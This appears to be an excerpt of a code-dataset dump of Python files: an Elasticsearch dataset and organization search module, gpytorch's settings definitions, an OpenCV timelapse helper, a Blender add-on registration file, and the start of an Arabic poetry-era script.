org_instance.description\n doc[\"org_types\"] = org_instance.organization_types\n doc[\"org_id\"] = catalog_instance.organization_id\n doc[\"org_logo\"] = str(org_instance.logo) if org_instance.logo else \"\"\n update_organization_index(\n OrganizationCreateRequest.objects.get(organization_ptr_id=org_instance.id)\n )\n resource_instance = Resource.objects.filter(dataset_id=dataset_obj.id)\n resource_title = []\n resource_description = []\n auth_required = []\n auth_type = []\n format = []\n for resources in resource_instance:\n resource_title.append(resources.title)\n resource_description.append(resources.description)\n # Checks based on datasets_type.\n if dataset_obj.dataset_type == DataType.API.value:\n try:\n api_details_obj = APIDetails.objects.get(resource_id=resources.id)\n auth_required.append(api_details_obj.auth_required)\n auth_type.append(api_details_obj.api_source.auth_type)\n format.append(api_details_obj.response_type)\n except APIDetails.DoesNotExist as e:\n pass\n elif dataset_obj.dataset_type == DataType.FILE.value:\n try:\n file_details_obj = FileDetails.objects.get(resource_id=resources.id)\n format.append(file_details_obj.format)\n except FileDetails.DoesNotExist as e:\n pass\n else:\n format.append(\"EXTERNAL LINK\")\n # Index all resources of a dataset.\n doc[\"resource_title\"] = resource_title\n doc[\"resource_description\"] = resource_description\n # if auth_required:\n # doc[\"auth_required\"] = auth_required\n # if auth_type:\n # doc[\"auth_type\"] = auth_type\n # if format:\n # doc[\"format\"] = format\n\n # Index Data Access Model.\n # dam_instances = DatasetAccessModel.objects.filter(dataset=dataset_obj)\n # data_access_model_ids = []\n # data_access_model_titles = []\n # data_access_model_types = []\n # dataset_access_models = []\n # license = []\n # for dam in dam_instances:\n # data_access_model_ids.append(dam.data_access_model.id)\n # data_access_model_titles.append(dam.data_access_model.title)\n # data_access_model_types.append(dam.data_access_model.type)\n # license.append(dam.data_access_model.license.title)\n # dataset_access_models.append(\n # {\n # \"id\": dam.id,\n # \"type\": dam.data_access_model.type,\n # \"payment_type\": dam.payment_type,\n # \"payment\": dam.payment,\n # }\n # )\n # doc[\"dataset_access_models\"] = dataset_access_models\n # doc[\"data_access_model_id\"] = data_access_model_ids\n # doc[\"data_access_model_title\"] = data_access_model_titles\n # doc[\"data_access_model_type\"] = data_access_model_types\n # doc[\"license\"] = license\n\n # Check if Dataset already exists.\n resp = es_client.exists(index=\"dataset\", id=dataset_obj.id)\n if resp:\n # Delete the Dataset.\n resp = es_client.delete(index=\"dataset\", id=dataset_obj.id)\n # print(resp[\"result\"])\n # Index the Dataset.\n resp = es_client.index(index=\"dataset\", id=dataset_obj.id, document=doc)\n update_organization_index(\n OrganizationCreateRequest.objects.get(organization_ptr_id=org_instance.id)\n )\n # print(resp[\"result\"])\n return resp[\"result\"]\n\n\n# def get_doc(doc_id):\n# resp = es_client.get(index=\"dataset\", id=doc_id)\n# #print(resp)\n# print(resp['_source'])\n\n\ndef delete_data(id):\n resp = es_client.delete(index=\"dataset\", id=id)\n print(resp[\"result\"])\n\n\ndef facets(request):\n filters = [] # List of queries for elasticsearch to filter up on.\n selected_facets = [] # List of facets that are selected.\n facet = [\n \"license\",\n \"geography\",\n \"format\",\n # \"status\",\n # \"rating\",\n \"sector\",\n # \"org_types\",\n ]\n # dam_type = request.GET.get(\"type\")\n # payment_type = request.GET.get(\"payment_type\")\n size = request.GET.get(\"size\")\n if not size:\n size = 5\n paginate_from = request.GET.get(\"from\", 0)\n query_string = request.GET.get(\"q\")\n sort_by = request.GET.get(\"sort_by\", None)\n sort_order = request.GET.get(\"sort\", \"\")\n if sort_order == \"\":\n sort_order = \"desc\"\n org = request.GET.get(\"organization\", None)\n start_duration = request.GET.get(\"start_duration\", None)\n end_duration = request.GET.get(\"end_duration\", None)\n # print(sort_by, sort_order)\n if sort_by and sort_order:\n if sort_by == \"modified\":\n sort_mapping = {\"modified\": {\"order\": sort_order}}\n # elif sort_by == \"rating\":\n # sort_mapping = {\"average_rating\": {\"order\": sort_order}}\n elif sort_by == \"provider\":\n sort_mapping = {\"org_title.keyword\": {\"order\": sort_order}}\n elif sort_by == \"recent\":\n sort_mapping = {\"last_updated\": {\"order\": \"desc\"}}\n elif sort_by == \"relevance\":\n sort_mapping = {}\n # elif sort_by == \"downloads\":\n # sort_mapping = {\"download_count\": {\"order\": \"desc\"}}\n else:\n sort_mapping = {\"dataset_title.keyword\": {\"order\": sort_order}}\n else:\n sort_mapping = {}\n\n # Creating query for faceted search (filters).\n for value in facet:\n if value == \"sector\" and request.GET.get(value):\n filters.append(\n {\n \"match\": {\n f\"{value}\": {\n \"query\": request.GET.get(value).replace(\"||\", \" \"),\n \"operator\": \"AND\",\n }\n }\n }\n )\n selected_facets.append({f\"{value}\": request.GET.get(value).split(\"||\")})\n else:\n if request.GET.get(value):\n filters.append(\n {\"match\": {f\"{value}\": request.GET.get(value).replace(\"||\", \" \")}}\n )\n selected_facets.append({f\"{value}\": request.GET.get(value).split(\"||\")})\n\n # if dam_type:\n # filters.append(\n # {\"match\": {\"dataset_access_models.type\": dam_type.replace(\"||\", \" \")}}\n # )\n # selected_facets.append({\"type\": dam_type.split(\"||\")})\n # if payment_type:\n # filters.append(\n # {\n # \"match\": {\n # \"dataset_access_models.payment_type\": payment_type.replace(\n # \"||\", \" \"\n # )\n # }\n # }\n # )\n # selected_facets.append({\"payment_type\": payment_type.split(\"||\")})\n\n if org:\n filters.append({\"terms\": {\"org_title.keyword\": org.split(\"||\")}})\n selected_facets.append({\"organization\": org.split(\"||\")})\n\n if start_duration and end_duration:\n filters.append(\n {\n \"bool\": {\n \"must_not\": [\n {\"range\": {\"period_to\": {\"lte\": start_duration}}},\n {\"range\": {\"period_from\": {\"gte\": end_duration}}},\n ]\n }\n }\n )\n selected_facets.append({\"start_duration\": start_duration})\n selected_facets.append({\"end_duration\": end_duration})\n\n # Query for aggregations (facets).\n agg = {\n # \"license\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"license.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"license\": {\"terms\": {\"field\": \"license.keyword\", \"size\": 10000}},\n \"geography\": {\n \"global\": {},\n \"aggs\": {\"all\": {\"terms\": {\"field\": \"geography.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n },\n # \"geography\": {\"terms\": {\"field\": \"geography.keyword\", \"size\": 10000}},\n \"sector\": {\n \"global\": {},\n \"aggs\": {\"all\": {\"terms\": {\"field\": \"sector.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n },\n # \"sector\": {\"terms\": {\"field\": \"sector.keyword\", \"size\": 10000}},\n \"format\": {\n \"global\": {},\n \"aggs\": {\"all\": {\"terms\": {\"field\": \"format.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n },\n # \"format\": {\"terms\": {\"field\": \"format.keyword\", \"size\": 10000}},\n # \"status\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"status.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # # \"status\": {\"terms\": {\"field\": \"status.keyword\", \"size\": 10000}},\n # \"rating\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"rating.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"rating\": {\"terms\": {\"field\": \"rating.keyword\", \"size\": 10000}},\n # \"org_types\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"org_types.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"org_types\": {\"terms\": {\"field\": \"org_types.keyword\", \"size\": 10000}},\n \"organization\": {\n \"global\": {},\n \"aggs\": {\"all\": {\"terms\": {\"field\": \"org_title.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n },\n \"duration\": {\n \"global\": {},\n \"aggs\": {\n \"min\": {\"min\": {\"field\": \"period_from\", \"format\": \"yyyy-MM-dd\"}},\n \"max\": {\"max\": {\"field\": \"period_to\", \"format\": \"yyyy-MM-dd\"}},\n },\n },\n # \"type\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"dataset_access_models.type.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"type\": {\n # \"terms\": {\"field\": \"dataset_access_models.type.keyword\", \"size\": 10000}\n # },\n # \"payment_type\": {\n # \"global\": {},\n # \"aggs\": {\"all\": {\"terms\": {\"field\": \"dataset_access_models.payment_type.keyword\", \"size\": 10000, \"order\": {\"_key\" : \"asc\"}}}},\n # },\n # \"payment_type\": {\n # \"terms\": {\n # \"field\": \"dataset_access_models.payment_type.keyword\",\n # \"size\": 10000,\n # }\n # },\n }\n if not query_string:\n # For filter search\n query = {\"bool\": {\"must\": filters}}\n resp = es_client.search(\n index=\"dataset\",\n aggs=agg,\n query=query,\n size=size,\n from_=paginate_from,\n sort=sort_mapping,\n )\n else:\n # For faceted search with query string.\n filters.append(\n {\n \"bool\": {\n \"should\": [\n {\n \"match\": {\n \"dataset_title\": {\n \"query\": query_string,\n \"operator\": \"OR\",\n \"fuzziness\": \"AUTO\",\n \"boost\": \"2\",\n }\n }\n },\n {\"match\": {\"tags\": {\"query\": query_string, \"boost\": \"1\"}}},\n {\"match\": {\"geography\": {\"query\": query_string, \"boost\": \"1\"}}},\n {\n \"match\": {\n \"dataset_description\": {\n \"query\": query_string,\n \"boost\": \"0.5\",\n }\n }\n },\n ]\n }\n }\n )\n # filters.append({\"match_phrase_prefix\":{\"dataset_title\":{\"query\": query_string}}})\n query = {\"bool\": {\"must\": filters}}\n resp = es_client.search(\n index=\"dataset\",\n aggs=agg,\n query=query,\n size=size,\n from_=paginate_from,\n sort=sort_mapping,\n )\n resp[\"selected_facets\"] = selected_facets\n return JsonResponse(resp) # HttpResponse(json.dumps(resp))\n\n\ndef organization_search(request):\n query_string = request.GET.get(\"q\", None)\n size = request.GET.get(\"size\", 5)\n paginate_from = request.GET.get(\"from\", 0)\n sort_order: str = request.GET.get(\"sort\", None)\n\n if sort_order:\n if sort_order == \"last_modified\":\n sort_mapping = {\"remote_modified\": {\"order\": \"desc\"}}\n elif sort_order == \"trends\":\n sort_mapping = [{\"average_rating\": {\"order\": \"desc\"}}, {\"dataset_count\": {\"order\": \"desc\"}}]\n else:\n sort_mapping = {\"dataset_title.keyword\": {\"order\": sort_order}}\n else:\n sort_mapping = {}\n\n if query_string:\n filters = [\n {\n \"bool\": {\n \"should\": [\n {\n \"match\": {\n \"org_title\": {\n \"query\": query_string,\n \"operator\": \"OR\",\n \"fuzziness\": \"AUTO\",\n \"boost\": \"2\",\n }\n }\n },\n {\n \"match\": {\n \"org_description\": {\n \"query\": query_string,\n \"boost\": \"0.5\",\n }\n }\n },\n ],\n }\n }\n ]\n query = {\"bool\": {\"must\": filters}}\n # query = {\"match\": {\"org_title\": {\"query\": query_string, \"operator\": \"AND\"}}}\n else:\n query = {\"bool\": {\"must\": {\"range\": {\"dataset_count\": {\"gt\": 0}}}}}\n\n resp = es_client.search(\n index=\"organizations\",\n query=query,\n size=size,\n from_=paginate_from,\n sort=sort_mapping,\n )\n return HttpResponse(json.dumps(resp[\"hits\"]))\n\n\ndef more_like_this(request):\n id = request.GET.get(\"q\", None)\n if id:\n query = {\n \"more_like_this\": {\n \"like\": [{\"_index\": \"dataset\", \"_id\": id}],\n \"min_term_freq\": 0,\n \"max_query_terms\": 10,\n \"min_doc_freq\": 0,\n }\n }\n resp = es_client.search(index=\"dataset\", query=query)\n return HttpResponse(json.dumps(resp[\"hits\"]))\n\n\ndef org_user_count(organization):\n user_count = (\n DatasetAccessModelRequest.objects.filter(\n Q(access_model_id__dataset_id__catalog__organization=organization.id),\n Q(access_model_id__dataset__status__exact=\"PUBLISHED\"),\n )\n .values_list(\"user\")\n .distinct()\n .count()\n )\n return user_count\n\n\ndef org_dataset_count(organization):\n dataset = Dataset.objects.filter(\n Q(status__exact=\"PUBLISHED\"),\n Q(catalog__organization=organization.id),\n ).count()\n return dataset\n\n\ndef org_average_rating(organization):\n pub_datasets = Dataset.objects.filter(\n Q(status__exact=\"PUBLISHED\"),\n Q(catalog__organization=organization.id),\n )\n count = 0\n rating = 0\n for dataset in pub_datasets:\n dataset_rating = get_average_rating(dataset)\n if dataset_rating > 0:\n count = count + 1\n rating = rating + dataset_rating\n return rating / count if rating else 0\n\n\ndef reindex_organizations():\n obj = OrganizationCreateRequest.objects.all()\n for org_obj in obj:\n update_organization_index(org_obj)\n\n\ndef update_organization_index(org_obj):\n if org_obj.status == \"APPROVED\":\n doc = {\n \"id\": org_obj.id,\n \"org_title\": org_obj.title,\n \"org_description\": org_obj.description,\n \"homepage\": org_obj.homepage,\n \"contact\": org_obj.contact_email,\n \"type\": org_obj.organization_types,\n \"dpa_name\": org_obj.dpa_name,\n \"dpa_email\": org_obj.dpa_email,\n \"dpa_designation\": org_obj.dpa_designation,\n \"state\": org_obj.state.name if org_obj.state else \"\",\n \"parent\": org_obj.parent.id if org_obj.parent else \"\",\n \"dpa_phone\": org_obj.dpa_phone,\n \"dpa_tid\": org_obj.ogd_tid,\n \"sub_type\": org_obj.organization_subtypes,\n \"address\": org_obj.address,\n \"status\": org_obj.status,\n \"issued\": org_obj.issued,\n \"modified\": org_obj.modified,\n \"logo\": org_obj.logo.name,\n \"dataset_count\": org_dataset_count(org_obj),\n \"user_count\": org_user_count(org_obj),\n \"average_rating\": org_average_rating(org_obj),\n }\n # Check if Org already exists.\n resp = es_client.exists(index=\"organizations\", id=org_obj.id)\n if resp:\n # Delete the Org.\n resp = es_client.delete(index=\"organizations\", id=org_obj.id)\n # # print(resp[\"result\"])\n # Index the Organization.\n resp = es_client.index(index=\"organizations\", id=org_obj.id, document=doc)\n print(resp[\"result\"], org_obj.id)\n # return resp[\"result\"]\n\n\ndef reindex_data():\n dataset_obj = Dataset.objects.filter(status=\"PUBLISHED\")\n for datasets in dataset_obj:\n resp = index_data(datasets)\n if resp == \"created\":\n print(\"Dataset_id --\", datasets.id)\n else:\n print(\"Re-indexing failed!\")\n","repo_name":"CivicDataLab/OPub_DataServer","sub_path":"dataset_api/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":20232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32186878220","text":"#!/usr/bin/env python3\n\nimport torch\nfrom linear_operator.settings import (\n _linalg_dtype_cholesky,\n _linalg_dtype_symeig,\n cg_tolerance,\n cholesky_jitter,\n cholesky_max_tries,\n ciq_samples,\n deterministic_probes,\n fast_computations,\n linalg_dtypes,\n max_cg_iterations,\n max_cholesky_size,\n max_lanczos_quadrature_iterations,\n max_preconditioner_size,\n max_root_decomposition_size,\n min_preconditioning_size,\n minres_tolerance,\n num_contour_quadrature,\n num_trace_samples,\n preconditioner_tolerance,\n skip_logdet_forward,\n terminate_cg_by_size,\n tridiagonal_jitter,\n use_toeplitz,\n verbose_linalg,\n)\nfrom torch import Tensor\n\n\nclass _dtype_value_context:\n _global_float_value = None\n _global_double_value = None\n _global_half_value = None\n\n @classmethod\n def value(cls, dtype):\n if torch.is_tensor(dtype):\n dtype = dtype.dtype\n if dtype == torch.float:\n return cls._global_float_value\n elif dtype == torch.double:\n return cls._global_double_value\n elif dtype == torch.half:\n return cls._global_half_value\n else:\n raise RuntimeError(f\"Unsupported dtype for {cls.__name__}.\")\n\n @classmethod\n def _set_value(cls, float_value, double_value, half_value):\n if float_value is not None:\n cls._global_float_value = float_value\n if double_value is not None:\n cls._global_double_value = double_value\n if half_value is not None:\n cls._global_half_value = half_value\n\n def __init__(self, float_value=None, double_value=None, half_value=None):\n self._orig_float_value = self.__class__.value(torch.float)\n self._instance_float_value = float_value if float_value is not None else self._orig_float_value\n self._orig_double_value = self.__class__.value(torch.double)\n self._instance_double_value = double_value if double_value is not None else self._orig_double_value\n self._orig_half_value = self.__class__.value(torch.half)\n self._instance_half_value = half_value if half_value is not None else self._orig_half_value\n\n def __enter__(\n self,\n ):\n self.__class__._set_value(\n self._instance_float_value,\n self._instance_double_value,\n self._instance_half_value,\n )\n\n def __exit__(self, *args):\n self.__class__._set_value(self._orig_float_value, self._orig_double_value, self._orig_half_value)\n return False\n\n\nclass _feature_flag:\n r\"\"\"Base class for feature flag settings with global scope.\n The default is set via the `_default` class attribute.\n \"\"\"\n\n _default = False\n _state = None\n\n @classmethod\n def is_default(cls):\n return cls._state is None\n\n @classmethod\n def on(cls):\n if cls.is_default():\n return cls._default\n return cls._state\n\n @classmethod\n def off(cls):\n return not cls.on()\n\n @classmethod\n def _set_state(cls, state):\n cls._state = state\n\n def __init__(self, state=True):\n self.prev = self.__class__._state\n self.state = state\n\n def __enter__(self):\n self.__class__._set_state(self.state)\n\n def __exit__(self, *args):\n self.__class__._set_state(self.prev)\n return False\n\n\nclass _value_context:\n _global_value = None\n\n @classmethod\n def value(cls):\n return cls._global_value\n\n @classmethod\n def _set_value(cls, value):\n cls._global_value = value\n\n def __init__(self, value):\n self._orig_value = self.__class__.value()\n self._instance_value = value\n\n def __enter__(\n self,\n ):\n self.__class__._set_value(self._instance_value)\n\n def __exit__(self, *args):\n self.__class__._set_value(self._orig_value)\n return False\n\n\nclass debug(_feature_flag):\n \"\"\"\n Whether or not to perform \"safety\" checks on the supplied data.\n (For example, that the correct training data is supplied in Exact GP training mode)\n Pros: fewer data checks, fewer warning messages\n Cons: possibility of supplying incorrect data, model accidentially in wrong mode\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\nclass detach_test_caches(_feature_flag):\n \"\"\"\n Whether or not to detach caches computed for making predictions. In most cases, you will want this,\n as this will speed up derivative computations of the predictions with respect to test inputs. However,\n if you also need derivatives with respect to training inputs (e.g., because you have fantasy observations),\n then you must disable this.\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\nclass eval_cg_tolerance(_value_context):\n \"\"\"\n Relative residual tolerance to use for terminating CG when making predictions.\n\n (Default: 1e-2)\n \"\"\"\n\n _global_value = 0.01\n\n\nclass fast_pred_var(_feature_flag):\n \"\"\"\n Fast predictive variances using Lanczos Variance Estimates (LOVE)\n Use this for improved performance when computing predictive variances.\n\n As described in the paper:\n\n `Constant-Time Predictive Distributions for Gaussian Processes`_.\n\n See also: :class:`gpytorch.settings.max_root_decomposition_size` (to control the\n size of the low rank decomposition used for variance estimates).\n\n (Default: False)\n\n .. _`Constant-Time Predictive Distributions for Gaussian Processes`:\n https://arxiv.org/pdf/1803.06058.pdf\n \"\"\"\n\n _num_probe_vectors = 1\n\n @classmethod\n def num_probe_vectors(cls):\n return cls._num_probe_vectors\n\n @classmethod\n def _set_num_probe_vectors(cls, value):\n cls._num_probe_vectors = value\n\n def __init__(self, state=True, num_probe_vectors=1):\n self.orig_value = self.__class__.num_probe_vectors()\n self.value = num_probe_vectors\n super().__init__(state)\n\n def __enter__(self):\n self.__class__._set_num_probe_vectors(self.value)\n super().__enter__()\n\n def __exit__(self, *args):\n self.__class__._set_num_probe_vectors(self.orig_value)\n return super().__exit__()\n\n\nclass fast_pred_samples(_feature_flag):\n \"\"\"\n Fast predictive samples using Lanczos Variance Estimates (LOVE).\n Use this for improved performance when sampling from a predictive posterior matrix.\n\n As described in the paper:\n\n `Constant-Time Predictive Distributions for Gaussian Processes`_.\n\n See also: :class:`gpytorch.settings.max_root_decomposition_size` (to control the\n size of the low rank decomposition used for samples).\n\n (Default: False)\n\n .. _`Constant-Time Predictive Distributions for Gaussian Processes`:\n https://arxiv.org/pdf/1803.06058.pdf\n \"\"\"\n\n _default = False\n\n\nclass lazily_evaluate_kernels(_feature_flag):\n \"\"\"\n Lazily compute the entries of covariance matrices (set to True by default).\n This can result in memory and speed savings - if say cross covariance terms are not needed\n or if you only need to compute variances (not covariances).\n\n If set to False, gpytorch will always compute the entire covariance matrix between\n training and test data.\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\nclass max_eager_kernel_size(_value_context):\n \"\"\"\n If the joint train/test covariance matrix is less than this size, then we will avoid as\n much lazy evaluation of the kernel as possible.\n\n (Default: 512)\n \"\"\"\n\n _global_value = 512\n\n\nclass memory_efficient(_feature_flag):\n \"\"\"\n Whether or not to use Toeplitz math with gridded data, grid inducing point modules\n Pros: memory efficient, faster on CPU\n Cons: slower on GPUs with < 10000 inducing points\n\n (Default: False)\n \"\"\"\n\n _default = False\n\n\nclass min_fixed_noise(_dtype_value_context):\n \"\"\"\n The minimum noise value that can be used in :obj:`~gpytorch.likelihoods.FixedNoiseGaussianLikelihood`.\n If the supplied noise values are smaller than this, they are rounded up and a warning is raised.\n\n - Default for `float`: 1e-4\n - Default for `double`: 1e-6\n - Default for `half`: 1e-3\n \"\"\"\n\n _global_float_value = 1e-4\n _global_double_value = 1e-6\n _global_half_value = 1e-3\n\n\nclass min_variance(_dtype_value_context):\n \"\"\"\n The minimum variance that can be returned from :obj:`~gpytorch.distributions.MultivariateNormal#variance`.\n If variances are smaller than this, they are rounded up and a warning is raised.\n\n - Default for `float`: 1e-6\n - Default for `double`: 1e-10\n - Default for `half`: 1e-3\n \"\"\"\n\n _global_float_value = 1e-6\n _global_double_value = 1e-10\n _global_half_value = 1e-3\n\n\nclass num_gauss_hermite_locs(_value_context):\n \"\"\"\n The number of samples to draw from a latent GP when computing a likelihood\n This is used in variational inference and training\n\n (Default: 20)\n \"\"\"\n\n _global_value = 20\n\n\nclass num_likelihood_samples(_value_context):\n \"\"\"\n The number of samples to draw from a latent GP when computing a likelihood\n This is used in variational inference and training\n\n (Default: 10)\n \"\"\"\n\n _global_value = 10\n\n\nclass prior_mode(_feature_flag):\n \"\"\"\n If set to true, GP models will be evaluated in prior mode.\n This allows evaluating any Exact GP model in prior mode, even it if has training data / targets.\n\n (Default: False)\n \"\"\"\n\n _default = False\n\n\nclass sgpr_diagonal_correction(_feature_flag):\n \"\"\"\n If set to true, during posterior prediction the variances of the InducingPointKernel\n will be corrected to match the variances of the exact kernel.\n\n If false then no such correction will be performed (this is the default in other libraries).\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\nclass skip_posterior_variances(_feature_flag):\n \"\"\"\n Whether or not to skip the posterior covariance matrix when doing an ExactGP\n forward pass. If this is on, the returned gpytorch MultivariateNormal will have a\n ZeroLinearOperator as its covariance matrix. This allows gpytorch to not compute\n the covariance matrix when it is not needed, speeding up computations.\n\n (Default: False)\n \"\"\"\n\n _default = False\n\n\nclass trace_mode(_feature_flag):\n \"\"\"\n If set to True, we will generally try to avoid calling our built in PyTorch functions, because these cannot\n be run through torch.jit.trace.\n\n Note that this will sometimes involve explicitly evaluating lazy tensors and various other slowdowns and\n inefficiencies. As a result, you really shouldn't use this feature context unless you are calling torch.jit.trace\n on a GPyTorch model.\n\n Our hope is that this flag will not be necessary long term, once https://github.com/pytorch/pytorch/issues/22329\n is fixed.\n\n (Default: False)\n \"\"\"\n\n _default = False\n\n\nclass variational_cholesky_jitter(_dtype_value_context):\n \"\"\"\n The jitter value used for Cholesky factorizations in variational models.\n\n - Default for `float`: 1e-4\n - Default for `double`: 1e-6\n \"\"\"\n\n _global_float_value = 1e-4\n _global_double_value = 1e-6\n\n @classmethod\n def value(cls, dtype=None):\n return super().value(dtype=dtype)\n\n\nclass observation_nan_policy(_value_context):\n \"\"\"\n NaN handling policy for observations.\n\n * ``ignore``: Do not check for NaN values (the default).\n * ``mask``: Mask out NaN values during calculation. If an output is NaN in a single batch element, this output\n is masked for the complete batch. This strategy likely is a good choice if you have NaN values.\n * ``fill``: Fill in NaN values with a dummy value, perform computations and filter them later.\n Not supported by :class:`gpytorch.mlls.ExactMarginalLogLikelihood`.\n Does not support lazy covariance matrices during prediction.\n \"\"\"\n\n _fill_value = -999.0\n _global_value = \"ignore\"\n\n def __init__(self, value):\n if value not in {\"ignore\", \"mask\", \"fill\"}:\n raise ValueError(f\"NaN handling policy {value} not supported!\")\n super().__init__(value)\n\n @staticmethod\n def _get_observed(observations, event_shape) -> Tensor:\n \"\"\"\n Constructs a tensor that masks out all elements in the event shape of the tensor which contain a NaN value in\n any batch element. Applying this index flattens the event_shape, as the task structure cannot be retained.\n This function is used if observation_nan_policy is set to 'mask'.\n\n :param Tensor observations: The observations to search for NaN values in.\n :param torch.Size event_shape: The shape of a single event, i.e. the shape of observations without batch\n dimensions.\n :return: The mask to the event dimensions of the observations.\n \"\"\"\n return ~torch.any(torch.isnan(observations.reshape(-1, *event_shape)), dim=0)\n\n @classmethod\n def _fill_tensor(cls, observations) -> Tensor:\n \"\"\"\n Fills a tensor's NaN values with a filling value.\n This function is used if observation_nan_policy is set to 'fill'.\n\n :param Tensor observations: The tensor to fill with values.\n :return: The filled in observations.\n \"\"\"\n return torch.nan_to_num(observations, nan=cls._fill_value)\n\n\nclass use_keops(_feature_flag):\n \"\"\"\n Whether or not to use KeOps under the hood (when using any :class:`gpytorch.kernels.keops.KeOpsKernel`.\n In general, this flag should be set to True.\n Setting it to false will resort to non-KeOps computation,\n which will be slower but may be useful for debugging or timing comparisons.\n\n (Default: True)\n \"\"\"\n\n _default = True\n\n\n__all__ = [\n \"_linalg_dtype_symeig\",\n \"_linalg_dtype_cholesky\",\n \"cg_tolerance\",\n \"cholesky_jitter\",\n \"cholesky_max_tries\",\n \"ciq_samples\",\n \"debug\",\n \"detach_test_caches\",\n \"deterministic_probes\",\n \"eval_cg_tolerance\",\n \"fast_computations\",\n \"fast_pred_var\",\n \"fast_pred_samples\",\n \"lazily_evaluate_kernels\",\n \"linalg_dtypes\",\n \"max_eager_kernel_size\",\n \"max_cholesky_size\",\n \"max_cg_iterations\",\n \"max_lanczos_quadrature_iterations\",\n \"max_preconditioner_size\",\n \"max_root_decomposition_size\",\n \"memory_efficient\",\n \"min_preconditioning_size\",\n \"min_variance\",\n \"minres_tolerance\",\n \"num_contour_quadrature\",\n \"num_gauss_hermite_locs\",\n \"num_likelihood_samples\",\n \"num_trace_samples\",\n \"observation_nan_policy\",\n \"preconditioner_tolerance\",\n \"prior_mode\",\n \"sgpr_diagonal_correction\",\n \"skip_logdet_forward\",\n \"skip_posterior_variances\",\n \"terminate_cg_by_size\",\n \"trace_mode\",\n \"tridiagonal_jitter\",\n \"use_keops\",\n \"use_toeplitz\",\n \"variational_cholesky_jitter\",\n \"verbose_linalg\",\n]\n","repo_name":"cornellius-gp/gpytorch","sub_path":"gpytorch/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":14799,"program_lang":"python","lang":"en","doc_type":"code","stars":3285,"dataset":"github-code","pt":"3"} +{"seq_id":"13511811468","text":"import os\nimport cv2 as cv\nimport numpy as np\n\n\nclass Timelapser:\n\n TIMELAPSE_CHOICES = ('no', 'as_is', 'crop',)\n DEFAULT_TIMELAPSE = 'no'\n\n def __init__(self, timelapse=DEFAULT_TIMELAPSE):\n self.do_timelapse = True\n self.timelapse_type = None\n self.timelapser = None\n\n if timelapse == \"as_is\":\n self.timelapse_type = cv.detail.Timelapser_AS_IS\n elif timelapse == \"crop\":\n self.timelapse_type = cv.detail.Timelapser_CROP\n else:\n self.do_timelapse = False\n\n if self.do_timelapse:\n self.timelapser = cv.detail.Timelapser_createDefault(\n self.timelapse_type\n )\n\n def initialize(self, *args):\n \"\"\"https://docs.opencv.org/4.x/dd/dac/classcv_1_1detail_1_1Timelapser.html#aaf0f7c4128009f02473332a0c41f6345\"\"\" # noqa\n self.timelapser.initialize(*args)\n\n def process_and_save_frame(self, img_name, img, corner):\n self.process_frame(img, corner)\n cv.imwrite(self.get_fixed_filename(img_name), self.get_frame())\n\n def process_frame(self, img, corner):\n mask = np.ones((img.shape[0], img.shape[1]), np.uint8)\n img = img.astype(np.int16)\n self.timelapser.process(img, mask, corner)\n\n def get_frame(self):\n frame = self.timelapser.getDst()\n frame = np.float32(cv.UMat.get(frame))\n frame = cv.convertScaleAbs(frame)\n return frame\n\n @staticmethod\n def get_fixed_filename(img_name):\n dirname, filename = os.path.split(img_name)\n return os.path.join(dirname, \"fixed_\" + filename)\n","repo_name":"alanross/AlvaAR","sub_path":"src/libs/opencv/apps/opencv_stitching_tool/opencv_stitching/timelapser.py","file_name":"timelapser.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"3"} +{"seq_id":"37615691051","text":"import bpy\nfrom . import SharMemIOClasses\n\nbl_info = {'name': \"SHAR Memory IO\",\n 'author': 'Weasel On A Stick',\n 'version': (1, 0, 0),\n 'blender': (2, 82, 7),\n 'location': 'View3D > Sidebar > SharMemIO',\n 'description': 'Read/write in-game player/car position for SHAR (REQUIRES PYMEM)',\n #'tracker_url': 'https://github.com/WeaselOnaStick/map-data-editor/issues',\n #'wiki_url': 'https://github.com/WeaselOnaStick/map-data-editor/wiki',\n 'category': 'User Interface'}\n\n\nclasses = SharMemIOClasses.to_register\n\n\ndef register():\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n \n bpy.types.Scene.SMIO = bpy.props.PointerProperty(\n type=(SharMemIOClasses.SMIOPropGroup),\n name=\"SHAR Memory IO\",\n )\n\n\ndef unregister():\n from bpy.utils import unregister_class\n for cls in classes:\n unregister_class(cls)\n del bpy.types.Scene.SMIO\n\n\nif __name__ == '__main__':\n register()\n","repo_name":"WeaselOnaStick/SharMemIO","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21695402096","text":"import sys\nimport getopt\nfrom pathlib import Path\nhome = str(Path.home())\nimport tempfile\n\neras = ['Jahiliy','SadrIslam','Umayyad','Abbasid','Dual','Modern']\nmapEraToArabic = {\n eras[0]: 'العصر الجاهلي',\n eras[1]: 'عصر صدر 